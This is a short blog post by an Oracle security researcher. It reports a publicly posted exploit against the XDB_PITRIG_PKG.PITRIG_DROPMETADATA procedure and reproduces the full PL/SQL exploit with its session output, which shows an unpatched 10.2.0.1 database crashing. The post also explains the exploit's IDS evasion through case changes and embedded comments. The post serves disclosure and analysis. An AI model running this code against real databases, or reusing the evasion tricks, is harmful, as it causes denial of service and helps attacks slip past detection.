Pete Finnigan's Oracle Security Weblog

Last Friday someone calling themselves oraclefun at hushmail dot com posted an exploit for Oracle database using the package XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA. No versions were given as to which are vulnerable but Alex posted in his blog that unpatched 10.2.0.1 and 10.2.0.2 systems are affected and crash. I tested this on an unpatched 10.2.0.1 database:

SQL> grant create session to x identified by x; Grant succeeded. SQL> connect x/x Connected. SQL> edit Wrote file afiedt.buf 1 -- Utility to free Oracle memory 2 declare 3 larry varchar2(32767); 4 mary varchar2(32767); 5 begin 6 larry:='larryellison'; 7 larry:=larry||larry; 8 larry:=larry||larry; 9 larry:=larry||larry; 10 larry:=larry||larry; 11 larry:=larry||larry; 12 larry:=larry||larry; 13 larry:=larry||larry; 14 mary:='maryann'; 15 mary:=mary||mary; 16 mary:=mary||mary; 17 mary:=mary||mary; 18 mary:=mary||mary; 19 mary:=mary||mary; 20 mary:=mary||mary; 21 mary:=mary||mary; 22 mary:=mary||mary; 23 xDb 24 /*Mary*/./*And*/XDB_PITRIG_PKG/*Larry*/./**/PITRIG_DROPMETADATA(mary 25 , larry); 26* end; SQL> / declare * ERROR at line 2: ORA-03135: connection lost contact SQL> connect system/manager ERROR: ORA-12514: TNS:listener does not currently know of service requested in connect descriptor SQL> connect system/manager Connected. SQL>

As you can see running this Oracle exploit code causes the connection to the database to be lost. This in fact has crashed the database. I had to restart the database:



The interesting thing with this exploit is that it uses some IDS evasion techniques. It uses case changes and also embedded comments to throw off IDS and IPS software that use simple rules to detect this type of attack.